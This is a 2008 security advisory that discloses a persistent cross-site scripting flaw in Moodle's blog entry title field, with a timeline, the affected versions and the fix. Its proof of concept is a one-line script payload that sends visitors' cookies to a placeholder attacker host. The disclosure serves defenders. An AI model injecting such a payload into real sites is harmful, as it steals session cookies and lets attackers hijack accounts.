ProCheckUp Security Advisory 2008.13

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
PR08-13: Persistent Cross-site Scripting (XSS) on Moodle via blog entry  
title  
  
Vulnerability found: 20/06/2008  
  
Vendor informed: 25/06/2008  
  
Vulnerability fixed: 16/07/2008  
  
Advisory publicly released: 22/07/2008  
  
Severity: High  
  
Description:  
  
By creating a new blog entry ('/blog/edit.php') with a malicious entry  
title ('etitle' parameter), it is possible to inject unrestricted  
JavaScript and HTML *persistently* into the application. The malicious  
code would be returned (and executed) on the main blog section of the  
site ('/blog/') which can be viewed by any type of account (i.e.: guest,  
student, teacher, administrator, etc).  
  
  
Notes:  
  
- - Prerequisite for successful exploitation is blogs being enabled and  
attacker's account having capabilities to add new entries.  
  
- - Moodle reveals its version within HTML source code. i.e.: <a  
title="moodle 1.6.5 + (2006050550)" href="http://moodle.org/">  
  
Proof of concept:  
  
Example of malicious code to be injected as a new blog entry title. Such  
code forwards the cookies of any users who access the blog section of  
the site to a third-party website:  
  
<script>location='http://evil.foo/x.php?'+document.cookie</script>  
  
The proof of concept was tested on the following environment:  
  
Server: Apache/2.2.2 (Unix) PHP/5.2.1 mod_ssl/2.2.2 OpenSSL/0.9.7l  
Moodle 1.6.5 + (2006050550)  
  
Consequences:  
  
It is possible to hijack any account (including privileged ones) by  
stealing the victim's session ID (stored in cookies), or inject a spoof  
HTML login form for phishing purposes. Other attacks are also possible.  
  
Versions affected as confirmed by the vendor:  
  
1.7.3, 1.7.4, 1.6.5, 1.7.2, 1.7.1, 1.7, 1.6.6, 1.6.4, 1.6.3, 1.6.2,  
1.6.1, 1.6  
  
Fix:  
  
Upgrade to 1.6.7, 1.7.5 or any recent nightly or use patch  
http://cvs.moodle.org/moodle/blog/lib.php?r1=1.38.6.3&r2=1.38.6.2  
  
This issue has been tracked as MDL-15392.  
  
  
References:  
  
http://moodle.org/mod/forum/discuss.php?d=101401  
http://www.procheckup.com/Vulnerabilities.php  
  
Credits: Adrian Pastor and Amir Azam of ProCheckUp Ltd. (www.procheckup.com)  
  
ProCheckUp would like to thank Petr Skoda and the rest of the Moodle  
team for their excellent response time and cooperation towards resolving  
this matter.  
  
Legal:  
  
Copyright 2008 Procheckup Ltd. All rights reserved.  
  
Permission is granted for copying and circulating this Bulletin to the  
Internet community for the purpose of alerting them to problems, if and  
only if, the Bulletin is not edited or changed in any way, is attributed  
to Procheckup, and provided such reproduction and/or distribution is  
performed for non-commercial purposes.  
  
Any other use of this information is prohibited. Procheckup is not  
liable for any misuse of this information by any third party.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.6 (GNU/Linux)  
  
iD8DBQFIhgDPoR/Hvsj3i8sRApqFAJ448lzgmoz6wsIwndxlKp6Aho0XdACfb/8N  
DWov7Q8NG1otTxbxtL2R4U8=  
=Zfxc  
-----END PGP SIGNATURE-----  
`